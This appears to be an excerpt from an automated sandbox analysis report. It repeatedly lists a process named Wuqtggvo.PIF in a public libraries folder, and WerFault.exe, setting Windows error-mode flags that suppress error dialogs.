Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
